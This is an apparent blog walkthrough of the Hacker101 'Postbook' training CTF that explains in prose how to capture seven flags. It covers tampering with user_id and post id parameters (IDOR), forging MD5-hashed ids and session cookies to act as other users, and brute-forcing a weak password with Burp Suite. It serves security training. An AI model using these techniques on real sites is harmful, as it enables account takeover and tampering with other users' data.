Postbook is a beginner-friendly, easy difficulty Web CTF from the Hacker101 CTF platform.
This CTF contains seven hidden flags, and In this walkthrough, I will guide you step-by-step through the process of uncovering each flag.
So, click on the ‘start’ button and let’s find the first flag! (:
When entering the CTF, you’ll encounter a welcoming page offering sign-in and sign-up options:
Since I don’t have a user, I’ll create one and log in:
With access gained, I can now explore a variety of new features. I’ll test these functions to uncover anything of interest.
I’ll start with creating a new post:
I’ll use Burp Suite to intercept and modify my requests.
Burp Suite is a valuable tool for exploring and exploiting vulnerabilities in web applications. It allows for interception and manipulation of web traffic, enabling the discovery and exploitation of security weaknesses.
While examining the POST request, I identified an interesting parameter that caught my attention:
This is interesting because the value of this parameter is expected (not a hash or a random number), and since my user_id is 3, and I’m the newest user, I’ll try to modify the ‘user_id’ value to ‘1’ or ‘2’ and observe the responses.
In order to modify the request, I’ll send the request to Burp’s Repeater:
I’ll modify the ‘user_id’ value to ‘1’ and send it:
Captured the first flag! 🚩
1 / 7 🚩
Let’s move on to the second flag.
I noticed two existing posts:
After clicking on the link to the first post, I observed an interesting parameter in the URL:
Similar to the earlier parameter we encountered, the ‘id’ parameter in this case also appears to be predictable. Based on this observation, I’ll attempt to enumerate additional post IDs.
To do so, I’ll use Burp’s Intruder:
Analyzing the length of the responses led me to identify valid post IDs; specifically, those responses exceeding 1500 in length indicate requests with valid post IDs. So, my next step is to access these posts by altering the ‘id’ value in the URL to the identified valid IDs.
I’ll begin by exploring the post ID value ‘945’, as it appears to be the most interesting among the identified IDs:
Captured the second flag! 🚩
2 / 7 🚩🚩
Next, I’ll test the value ‘2’:
Captured the third flag! 🚩
3 / 7 🚩🚩🚩
Let’s move on to the next flag.
I observed two additional functions available — ‘edit’ and ‘delete’:
I’ll test the ‘edit’ function first:
The ‘id’ parameter appears to be a common element here as well, so maybe I can edit other users’ posts by altering the ‘id’ value to one of the post IDs I previously identified.
I’ll modify the ‘id’ value to ‘2’ and observe the response:
It worked!
I’ll edit and save the post:
Captured the fourth flag! 🚩
4 / 7 🚩🚩🚩🚩
Next, I’ll test the ‘delete’ function:
I observed that the GET request also includes the ‘id’ parameter, yet intriguingly, its value differs from previous instances:
After conducting a basic Google search, I identified that this particular value is in fact an MD5 hash.
Knowing now that this value is an MD5 hash, I’ll attempt to decrypt it using a random MD5 decryption website.
The ‘id’ value is 4!
I’ll MD5 encrypt the number ‘2’ and then modify the GET request:
Captured the fifth flag! 🚩
5 / 7 🚩🚩🚩🚩🚩
Let’s move on to the next flag.
I observed that all the requests also include a cookie value, which, interestingly, is also an MD5 hash:
The Cookie ‘id’ value is identical to the one I previously encountered, indicating that the ‘id’ value in this context is also ‘4’.
I’ll MD5 encrypt the number ‘1’ and modify the ‘id’ value:
We’ve successfully captured the sixth flag! Only one final flag remains to be found! 🚩
6 / 7 🚩🚩🚩🚩🚩🚩
Let’s move on to the last flag! (:
I observed that there is a user called ‘user’ on the website:
I’ll attempt to brute-force the password for the ‘user’ account using Burp Suite’s Intruder:
After analyzing the status codes, I’ve determined that the password for the ‘user’ account is ‘password’. The password is not case-sensitive, meaning variations like ‘Password’ and ‘PASSWORD’ are also valid.
With the ‘user’ account password now known, I’ll proceed to log into the user’s account.
Success! Captured the seventh and final flag! 🚩
7 / 7 🚩🚩🚩🚩🚩🚩🚩
Thank you for taking the time to read this walkthrough, and I hope that it has been informative and valuable to you.
Happy hacking! 🖤